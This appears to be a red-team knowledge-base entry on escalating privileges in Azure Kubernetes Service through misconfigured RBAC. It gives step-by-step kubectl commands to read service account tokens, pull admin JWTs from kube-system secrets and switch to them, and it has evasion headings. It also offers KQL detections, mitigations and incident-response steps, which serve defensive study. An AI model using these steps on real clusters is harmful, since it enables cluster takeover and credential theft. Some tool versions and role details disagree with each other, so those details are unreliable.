MCADDF

[PE-ELEVATE-007]: AKS RBAC Excessive Permissions

Metadata

Attribute Details
Technique ID PE-ELEVATE-007
MITRE ATT&CK v18.1 T1548 - Abuse Elevation Control Mechanism
Tactic Privilege Escalation
Platforms Entra ID (Azure Kubernetes Service)
Severity Critical
Technique Status ACTIVE
Last Verified 2026-01-09
Affected Versions AKS clusters (all versions), Kubernetes RBAC implementation
Patched In N/A (Design-based vulnerability, not patchable)
Author SERVTEPArtur Pchelnikau

1. EXECUTIVE SUMMARY

Concept: Azure Kubernetes Service (AKS) Role-Based Access Control (RBAC) misconfiguration allows attackers with limited Kubernetes cluster access to escalate privileges by exploiting overly permissive ClusterRole or Role bindings. This technique leverages the hierarchical nature of Kubernetes RBAC, where a compromised service account can inherit excessive permissions through role bindings that grant cluster-admin, edit, or view roles inappropriately across namespaces.

Attack Surface: Kubernetes API server, ClusterRole/Role definitions, RoleBinding/ClusterRoleBinding resources, service account token storage in pods, API audit logs.

Business Impact: Complete cluster compromise leading to workload exfiltration, lateral movement to backing infrastructure, and persistent backdoor installation. An attacker can move from a limited pod context to full cluster administration, enabling data theft, ransomware deployment across containerized applications, and supply chain attacks through container image manipulation.

Technical Context: This attack typically completes within seconds of obtaining initial pod access. Detection is low unless specific RBAC audit policies are enabled. The privilege escalation is often irreversible without comprehensive access review and re-provisioning.

Operational Risk

Compliance Mappings

Framework Control / ID Description
CIS Benchmark CIS v1.24 - 5.1.1 RBAC and Service Accounts - Least privilege role assignment
DISA STIG DISA-K8S-000001 Kubernetes pods must run with restricted service accounts
CISA SCuBA CISA-K8S-AC-01 Access Control - Enforce least privilege for service accounts
NIST 800-53 AC-3, AC-6 Access Enforcement, Least Privilege
GDPR Art. 32 Security of Processing - Access control mechanisms
DORA Art. 9 Protection and Prevention - System access controls
NIS2 Art. 21(1)(d) Managing access to assets and services
ISO 27001 A.9.2.3 Management of Privileged Access Rights
ISO 27005 Risk of unauthorized privilege escalation Compromise of containerized workload isolation

2. TECHNICAL PREREQUISITES

Supported Versions:

Tools:


3. ENVIRONMENTAL RECONNAISSANCE

Management Station / Azure CLI Reconnaissance

Enumerate existing RBAC bindings to identify overly permissive roles:

# List all ClusterRoles with dangerous permissions
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'

# List all ClusterRoleBindings (who has what role)
kubectl get clusterrolebindings -o wide

# Check a specific service account's permissions
kubectl auth can-i --list --as=system:serviceaccount:default:default

What to Look For:

Version Note: Command syntax is consistent across Kubernetes 1.20+

Pod-Based Reconnaissance (From Compromised Container)

# Check mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Test current permissions
kubectl auth can-i get pods --namespace=default
kubectl auth can-i create pods --namespace=default
kubectl auth can-i get secrets

# Enumerate cluster roles available
kubectl get clusterroles | head -20

What to Look For:


4. DETAILED EXECUTION METHODS

METHOD 1: Exploiting Overly Permissive Default Service Account

Supported Versions: Kubernetes 1.20+, all AKS versions

Step 1: Verify Service Account Permissions

Objective: Determine if the default service account has excessive cluster permissions

Command:

kubectl auth can-i --list

Expected Output (Vulnerable):

Resources                                   Non-Resource URLs                     *   [*]
configmaps                              []                                       []  []
pods                                    []                                       []  []
pods/log                                []                                       []  []

What This Means:

Step 2: Enumerate All Available ClusterRoles

Objective: Identify dangerous pre-built roles available in the cluster

Command:

kubectl get clusterroles -o json | jq -r '.items[] | .metadata.name' | sort

Expected Output:

admin
cluster-admin
edit
system:aggregate-to-admin
system:masters
view
...

What This Means:

Step 3: Check Current RoleBindings

Objective: Identify which service accounts are bound to dangerous roles

Command:

kubectl get rolebindings,clusterrolebindings --all-namespaces -o json | jq '.items[] | select(.roleRef.name == "cluster-admin" or .roleRef.name == "edit" or .roleRef.name == "admin") | {namespace: .metadata.namespace, subject: .subjects[], role: .roleRef.name}'

Expected Output (Vulnerable):

{
  "namespace": "default",
  "subject": {
    "kind": "ServiceAccount",
    "name": "app-sa",
    "namespace": "default"
  },
  "role": "edit"
}

What This Means:

OpSec & Evasion:

Step 4: Create Privilege Escalation Pod

Objective: Deploy a new pod with escalated permissions

Command:

kubectl create deployment escalate-pod --image=alpine --namespace=default
kubectl set serviceaccount deployment escalate-pod admin-sa --namespace=default
kubectl patch deployment escalate-pod --patch '{"spec":{"template":{"spec":{"serviceAccountName":"admin-sa"}}}}' --namespace=default

Expected Output:

deployment.apps/escalate-pod created
deployment.apps/escalate-pod patched

What This Means:

Troubleshooting:

Step 5: Access Elevated Permissions from New Pod

Objective: Verify privilege escalation within the new pod container

Command (Execute inside the pod):

kubectl exec -it escalate-pod-<hash> -- /bin/sh

# Inside the pod:
kubectl auth can-i --list
kubectl get secrets -n kube-system

Expected Output:

Resources                                   *   [*]
*.*                                         []  []

NAME                                      TYPE                                  DATA
...

What This Means:

OpSec & Evasion:


METHOD 2: Exploiting ClusterRole Wildcard Permissions

Supported Versions: Kubernetes 1.20+

Step 1: Identify Dangerous ClusterRoles with Wildcards

Objective: Find ClusterRoles that grant * (wildcard) permissions

Command:

kubectl get clusterroles -o json | jq '.items[] | select(.rules[] | select(.verbs[] == "*" or .apiGroups[] == "*")) | {name: .metadata.name, rules: .rules}'

Expected Output (Vulnerable):

{
  "name": "custom-admin",
  "rules": [
    {
      "apiGroups": ["*"],
      "resources": ["*"],
      "verbs": ["*"]
    }
  ]
}

What This Means:

Step 2: Identify Service Accounts Bound to Wildcard Roles

Objective: Find which service accounts are bound to dangerous roles

Command:

kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "custom-admin") | {name: .metadata.name, subjects: .subjects[]}'

Expected Output:

{
  "name": "custom-admin-binding",
  "subjects": {
    "kind": "ServiceAccount",
    "name": "app-service",
    "namespace": "applications"
  }
}

What This Means:

Step 3: Escalate from Current Pod to Admin Service Account

Objective: Transition from limited pod context to admin service account

Command:

# Use the admin service account's token (if accessible)
export TOKEN=$(kubectl get secret -n applications $(kubectl get secret -n applications | grep app-service | awk '{print $1}') -o jsonpath='{.data.token}' | base64 -d)

# Configure kubectl to use the admin token
kubectl config set-credentials admin-creds --token=$TOKEN
kubectl config set-context admin-context --user=admin-creds --cluster=<cluster-name>
kubectl config use-context admin-context

# Verify escalation
kubectl auth can-i --list

Expected Output:

Resources                                   *   [*]
*.*                                         []  []

What This Means:

OpSec & Evasion:


METHOD 3: RBAC Lateral Movement via Service Account Token Theft

Supported Versions: Kubernetes 1.20+

Step 1: Identify Service Accounts with Higher Permissions in Other Namespaces

Objective: Enumerate all service accounts and their RBAC bindings cluster-wide

Command:

# List all service accounts and their namespaces
kubectl get serviceaccounts --all-namespaces -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name}'

# For each service account, check its role bindings
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  echo "=== Namespace: $ns ==="
  kubectl get rolebindings -n $ns -o json | jq '.items[] | {role: .roleRef.name, subjects: .subjects[]}'
done

Expected Output:

{
  "namespace": "default",
  "name": "default"
}
{
  "namespace": "kube-system",
  "name": "kubernetes-dashboard"
}
...

What This Means:

Step 2: Extract Token from Target Service Account

Objective: Obtain the JWT token of a service account with higher privileges

Command:

# If you have RBAC access to list secrets in kube-system or other namespaces
kubectl get secret -n kube-system -o json | jq '.items[] | select(.type == "kubernetes.io/service-account-token") | {name: .metadata.name, namespace: .metadata.namespace}'

# Extract a specific token
SECRET_NAME=$(kubectl get secret -n kube-system | grep kubernetes-dashboard | awk '{print $1}')
kubectl get secret $SECRET_NAME -n kube-system -o jsonpath='{.data.token}' | base64 -d

Expected Output:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Ii...

What This Means:

Step 3: Use Extracted Token for Privilege Escalation

Objective: Authenticate as the higher-privilege service account

Command:

# Use the extracted token to make API calls
curl -k -H "Authorization: Bearer $EXTRACTED_TOKEN" https://kubernetes.default.svc.cluster.local/api/v1/pods

# Or configure kubectl with the token
kubectl config set-credentials dashboard-sa --token=$EXTRACTED_TOKEN
kubectl config set-context dashboard-context --user=dashboard-sa --cluster=$(kubectl config current-context)
kubectl config use-context dashboard-context

# Verify escalation
kubectl auth can-i delete clusterrolebindings

Expected Output:

yes

What This Means:

OpSec & Evasion:


5. TOOLS & COMMANDS REFERENCE

kubectl

Version: Latest stable (v1.28+) Minimum Version: 1.20 Supported Platforms: Linux, Windows, macOS

Installation:

# Download and install kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/

Usage:

# Check permissions
kubectl auth can-i get pods

# List roles
kubectl get roles,clusterroles

# Create a pod
kubectl create deployment app --image=nginx

Azure CLI

Version: Latest stable (2.55+) Minimum Version: 2.0 Supported Platforms: Linux, Windows, macOS

Installation:

# macOS
brew install azure-cli

# Linux
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

# Windows
chocolatey install azure-cli

Usage:

# Connect to AKS
az aks get-credentials --resource-group myGroup --name myCluster
kubectl config current-context

# List AKS clusters
az aks list --output table

kubescan

Version: 3.0+ Minimum Version: 1.0 Supported Platforms: Linux, Windows, macOS

Installation:

# From GitHub releases
wget https://github.com/aquasecurity/kubescan/releases/download/v2.0.0/kubescan-linux
chmod +x kubescan-linux
./kubescan-linux cluster

Usage:

# Scan for RBAC misconfigurations
./kubescan audit --kubeconfig ~/.kube/config

6. ATTACK SIMULATION & VERIFICATION

Atomic Red Team

Reference: While Atomic Red Team does not have a Kubernetes-specific test for this technique, you can reference Atomic Red Team T1548


7. MICROSOFT SENTINEL DETECTION

Query 1: Detect ClusterRole/RoleBinding Creation or Modification

Rule Configuration:

KQL Query:

AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where operationName in ("create", "patch", "replace")
| where properties.request.objectRef.resource in ("clusterrolebindings", "rolebindings")
| where properties.request.objectRef.apiVersion contains "rbac"
| extend UserIdentity = properties.authentication.principalId
| extend RoleName = properties.request.objectRef.name
| summarize Count = count() by UserIdentity, RoleName, tostring(properties.request.verb)
| where Count > 0

What This Detects:

Manual Configuration Steps (Azure Portal):

  1. Navigate to Azure PortalMicrosoft Sentinel
  2. Select your workspace → Analytics+ CreateScheduled query rule
  3. General Tab:
    • Name: AKS RBAC Binding Modification Detected
    • Severity: High
  4. Set rule logic Tab:
    • Paste the KQL query above
    • Run query every: 5 minutes
    • Lookup data from the last: 1 hour
  5. Incident settings Tab:
    • Enable Create incidents
  6. Click Review + create

Query 2: Detect Service Account Token Extraction or Abuse

KQL Query:

AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where properties.request.verb == "get"
| where properties.request.objectRef.resource == "secrets"
| where properties.request.objectRef.namespace in ("kube-system", "kube-public")
| where properties.authentication.principalId != "system:masters"
| extend ServiceAccount = properties.request.user.username
| extend TargetNamespace = properties.request.objectRef.namespace
| project TimeGenerated, ServiceAccount, TargetNamespace, tostring(properties.request.objectRef.name)

What This Detects:


8. WINDOWS EVENT LOG MONITORING

Not applicable for AKS cluster-side detection. Monitoring should occur at the Azure platform level via Microsoft Sentinel/Defender for Cloud or on the container host via kubelet logs.


9. MICROSOFT DEFENDER FOR CLOUD

Detection Alert: Suspicious Kubernetes Role Assignment

Alert Name: “Suspicious role assignment in Kubernetes cluster”

Manual Configuration Steps (Enable Defender for Cloud):

  1. Navigate to Azure PortalMicrosoft Defender for Cloud
  2. Go to Environment settings
  3. Select your subscription
  4. Under Defender plans, enable:
    • Defender for Servers: ON
    • Defender for Kubernetes: ON
  5. Click Save
  6. Go to Security alerts to view triggered alerts
  7. For Kubernetes-specific alerts, review: Defender for KubernetesWorkloadsPod-level detections

Reference: Microsoft Defender for Kubernetes Threat Detection


10. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

Priority 2: HIGH

Access Control & Policy Hardening

Validation Command (Verify Fix)

# Check if cluster-admin is only bound to trusted users
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin")'

# List all service accounts and their permissions
kubectl get serviceaccounts --all-namespaces -o json | jq -r '.items[] | "\(.metadata.namespace):\(.metadata.name)"' | while read SA; do
  NS=$(echo $SA | cut -d: -f1)
  NAME=$(echo $SA | cut -d: -f2)
  echo "=== $SA ==="
  kubectl auth can-i --list --as=system:serviceaccount:$NS:$NAME 2>/dev/null | grep -E "^\*|create|delete|patch"
done

Expected Output (If Secure):

No ClusterRoleBindings for cluster-admin (or only for system accounts)

=== default:app-sa ===
configmaps                         []  []  [get list watch]
pods                               []  []  [get list watch]

What to Look For:


11. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Forensic Artifacts

Response Procedures

  1. Isolate:

    Command:

    # Immediately delete the compromised pod
    kubectl delete pod <compromised-pod> --namespace=<namespace>
       
    # Or, revoke its service account token
    kubectl delete secret -l serviceaccount=<sa-name> --namespace=<namespace>
    

    Manual (Azure Portal):

    • Go to Azure Portal → Your AKS cluster → Workloads
    • Find the compromised pod → Click Delete
  2. Collect Evidence:

    Command:

    # Export audit logs from API server
    kubectl logs -n kube-system -l component=kube-apiserver | grep "roleBinding\|clusterrolebinding" > /evidence/audit-logs.txt
       
    # Export pod logs
    kubectl logs <compromised-pod> --namespace=<namespace> --all-containers > /evidence/pod-logs.txt
       
    # Export service account secrets
    kubectl get secret -n <namespace> -o yaml > /evidence/secrets.yaml
    
  3. Remediate:

    Command:

    # Review and delete unauthorized role bindings
    kubectl delete rolebinding <malicious-binding> --namespace=<namespace>
    kubectl delete clusterrolebinding <malicious-cluster-binding>
       
    # Restore default RBAC policies from backup or redeploy cluster
    kubectl apply -f <backup-rbac-config>.yaml --force-overwrite
    

Step Phase Technique Description
1 Initial Access [IA-EXPLOIT-005] AKS Control Plane Exploitation Gain initial access to the cluster via exposed Kubelet API or container escape
2 Privilege Escalation [PE-ELEVATE-007] AKS RBAC Excessive Permissions Exploit misconfigured RBAC to escalate from pod to cluster-admin
3 Lateral Movement [LM-AUTH-030] AKS Service Account Token Theft Extract and abuse service account tokens for cross-namespace movement
4 Credential Access [CA-TOKEN-013] AKS Service Account Token Theft Harvest tokens from compromised service accounts
5 Persistence [PERSIST-009] Kubernetes Secret Injection Create backdoor service accounts and roles for persistent access
6 Impact Container Image Tampering / Workload Exfiltration Manipulate deployments or exfiltrate containerized data

13. REAL-WORLD EXAMPLES

Example 1: Tesla Kubernetes Cluster Breach (2018)

Example 2: Kubernetes Namespace Isolation Bypass (Shopify Security Audits)